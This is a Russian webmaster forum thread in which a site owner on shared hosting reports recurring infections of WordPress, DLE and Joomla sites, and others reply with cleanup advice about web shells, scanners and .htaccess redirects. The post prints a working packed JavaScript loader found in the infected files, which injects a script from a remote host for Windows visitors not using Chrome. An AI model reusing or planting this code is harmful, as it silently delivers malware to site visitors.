- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Периодически на хостинге заражаются практически все сайты, смс: вп, дле, джумла.
Предполагаю, что очень серьезного на сайтах ничего нет, так как вебмастера Я и Г уже бы написали.
Сидит какая-то хрень, я все удалю, а оно снова в сайты гадню подсаживает.
вот скрин, что было:
Все файлы имеют расширение js.
Во всех одинаковое содержание:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d A(l){H(e.t&&e.G){5 s=e.G(\'1g\')[0];5 f=e.t(\'1h\');f.p(\'1i\',\'1j/1f\');f.p(\'l\',l);5 1e="=1a[<}8~j;%%]";5 1b="&4; y}[={4]";5 1c="1d/1k$#k]1l~z{1s:1t";5 19="%#1v=1r+3:%>1q";5 1m="X(^~1n{[1o@1p&1w-{W[";s.R(f)}}d E(){m x.O()}5 T="}0@U;N`)I)*]%$J";5 M="6]2(P}7-18=.h 14";5 15="b`~+2*u?+16@";5 17="13$12[Y$+";5 V="*Z=.q`10{11";d v(c){m c.r(o)!=-1}5 1u="4,*@`n+S[/*25";5 1x="C^1X?K * L";5 1W="9]+;20+*{*>$+)*21-1Z";5 1Y="[w=23;$22";5 27="26($24]2[i?.>}!a}";5 B="1U://1E.1F.c/1G";5 o="o";5 1H="1V]6:1D}!1C";5 1y="1z(}0}#@g`0[1A%1B*b";5 1I="4]%?1J^`~1Q<~4&4[1R*Q ";5 1S="1T(1P";5 1O="+~,& 1K!3`!(Q*/";d D(c){m c.r("1L")==-1}d F(){5 c=x.1M.1N();H(D(c)&&v(c)&&E()){A(B)}}F();',62,132,'|||||var|||||||ua|function|document|script_tag||||||src|return||win|setAttribute||indexOf|head_tag|createElement||isWin||navigator|||includeJavascript|url||n
otChrome|cond3|includeCounter|getElementsByTagName|if|oJTM7|pr|||bDyWnY1|UxJ|java
Enabled|xX||appendChild||bDyWnY0|tk|bDyWnY4|||abX|o5|RJ|Zme_|Pg|311|0Xf|bDyWnY2|u
6|bDyWnY3|rX|eqCaxYl3|O0BnA|eqCaxYl1|eqCaxYl2|81|eqCaxYl0|javascript|head|script|
type|text|Tm|l2|eqCaxYl4|6Z0a1|0p|bEc|MhW|KR6|uS|kS|BzqqE0|33|F9|BzqqE1|DtqGo1|7K
|rVDlg|6P|zi8|k4ld2|exaxad|pp|b23e441d405961897c09b2c9c9a2cdfcb23e441d405961897c0
9b2c9c9a2cdfcb23e441d405961897c09b2c9c9a2c|DtqGo0|DtqGo2|w6l|N3|chrome|userAgent|
toLowerCase|DtqGo4|OP|lE|QS|DtqGo3|tj4o0kk2|http|CX0|BzqqE2|5W|BzqqE3|5IG|Ct|92|6
Gr|x9YO|Ia8|57P|UtVM|BzqqE4'.split('|'),0,{}))
А причем тут хостинг?
The WishMaster, а кто при чем?
The WishMaster, а кто при чем?
Дырки в плагинах движков или шеллы.
ТС хостинг тоже может играть большую роль в безопасности ваших сайтов, но и сам код движков должен быть чист и закрыты популярные дыры.
Т.е. нельзя сказать, что именно только хостинг виноват без проверки самих сайтов на предмет вредоносных кодов.
У вас, практически наверняка, залит шелл. С WP, DLE, Joomla обычная история. Скрипт AI-Bolit найдет все файлы, куда он залит, для большинства случаев. Сайты на одном хостинге проверять комплексно. Также проверьте htaccess - почти наверняка вам поставили редирект для мобильных...